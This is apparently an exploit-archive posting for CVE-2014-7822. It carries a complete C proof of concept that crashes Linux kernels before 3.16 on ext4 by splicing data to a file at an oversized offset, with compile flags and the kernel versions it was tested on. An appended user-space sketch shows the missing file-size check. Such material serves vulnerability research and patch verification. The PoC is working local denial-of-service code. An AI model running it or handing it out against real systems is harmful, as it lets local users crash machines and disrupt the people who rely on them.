
Linux splice_write Kernel Panic

Posted Apr 11, 2015
Authored by Emeric Nasi

The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file, which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, as demonstrated by use of a file descriptor associated with an ext4 filesystem. This is proof of concept code that triggers the kernel panic.

tags | exploit, denial of service, kernel, local, proof of concept
systems | linux
advisories | CVE-2014-7822
SHA-256 | 7020e5cb8eb79147f24ae47ba61603cfdfc59462bdfbc98295dfc6b21c5a9a40


/* ----------------------------------------------------------------------------------------------------
* cve-2014-7822_poc.c
*
* The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
* which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
* as demonstrated by use of a file descriptor associated with an ext4 filesystem.
*
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
* Works on ext4 filesystem
* Tested on Ubuntu with 3.13 and 3.14 kernels
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
*
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/


/* ----------------------- Includes ----------------------------*/

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>

#define EXPLOIT_NAME "cve-2014-7822"
#define EXPLOIT_TYPE DOS

#define JUNK_SIZE 30000

/* ----------------------- functions ----------------------------*/


/* Useful:
*
+============+===============================+===============================+
| \ File flag|                               |                               |
|  \         |       !EXT4_EXTENTS_FL        |        EXT4_EXTENTS_FL        |
|Fs Features\|                               |                               |
+------------+-------------------------------+-------------------------------+
|  !extent   |     write: 2194719883264      |     write: --------------     |
|            |     seek:  2199023251456      |     seek:  --------------     |
+------------+-------------------------------+-------------------------------+
|  extent    |     write: 4402345721856      |     write: 17592186044415     |
|            |     seek:  17592186044415     |     seek:  17592186044415     |
+------------+-------------------------------+-------------------------------+
*/


/**
* Poc for cve_2014_7822 vulnerability
*/
int main()
{
    int pipefd[2];
    int result;
    int in_file;
    int out_file;
    int zulHandler;
    loff_t viciousOffset = 0;

    char junk[JUNK_SIZE] ={0};

    result = pipe(pipefd);

    // Create and clear zug.txt and zul.txt files
    system("cat /dev/null > zul.txt");
    system("cat /dev/null > zug.txt");

    // Fill zul.txt with A
    zulHandler = open("zul.txt", O_RDWR);
    memset(junk,'A',JUNK_SIZE);
    write(zulHandler, junk, JUNK_SIZE);
    close(zulHandler);

    //put content of zul.txt in pipe
    viciousOffset = 0;
    in_file = open("zul.txt", O_RDONLY);
    result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
    close(in_file);


    // Put content of pipe in zug.txt
    out_file = open("zug.txt", O_RDWR);
    viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!
    printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);

    result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
    if (result == -1)
    {
        printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
        exit(1);
    }
    close(out_file);

    close(pipefd[0]);
    close(pipefd[1]);


    //Open zug.txt
    in_file = open("zug.txt", O_RDONLY);
    close(in_file);

    printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");

    return 0;
}
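
The size restriction that the description says was not enforced, sketched as a user-space model (an added example, not code from the original page or from the kernel): an offset at or past the per-file maximum is refused with EFBIG, and a write that would cross the maximum is shortened. The function name check_write_limits is hypothetical; the limits are the write values from the PoC's comment table.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

/* Per-file write limits taken from the PoC's comment table (bytes). */
#define EXT4_MAX_EXTENT_FILE 17592186044415LL /* extent fs, EXT4_EXTENTS_FL */
#define EXT4_MAX_BITMAP_FILE  4402345721856LL /* extent fs, !EXT4_EXTENTS_FL */

/*
 * check_write_limits (hypothetical name): validate a write of *count bytes
 * at offset pos against the per-file maximum max_bytes.
 * Returns 0 (possibly shortening *count), -EFBIG or -EINVAL.
 */
int check_write_limits(int64_t pos, size_t *count, int64_t max_bytes)
{
    if (pos < 0 || max_bytes < 0)
        return -EINVAL;
    if (pos >= max_bytes) {
        /* Only a zero-length write exactly at the limit is acceptable. */
        if (*count != 0 || pos > max_bytes)
            return -EFBIG;
        return 0;
    }
    /* Compare against the remaining room so pos + count cannot overflow. */
    if ((uint64_t)*count > (uint64_t)(max_bytes - pos))
        *count = (size_t)(max_bytes - pos);
    return 0;
}

int main(void)
{
    size_t count = 30000;                  /* JUNK_SIZE in the PoC */
    int64_t offset = 118402345721856LL;    /* viciousOffset in the PoC */
    int rc = check_write_limits(offset, &count, EXT4_MAX_EXTENT_FILE);

    printf("offset %lld, limit %lld -> %s\n", (long long)offset,
           (long long)EXT4_MAX_EXTENT_FILE, rc == -EFBIG ? "EFBIG" : "allowed");
    return rc == -EFBIG ? 0 : 1;
}
```

With such a check in the write path, the offset used by the PoC is rejected before any data reaches the file.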


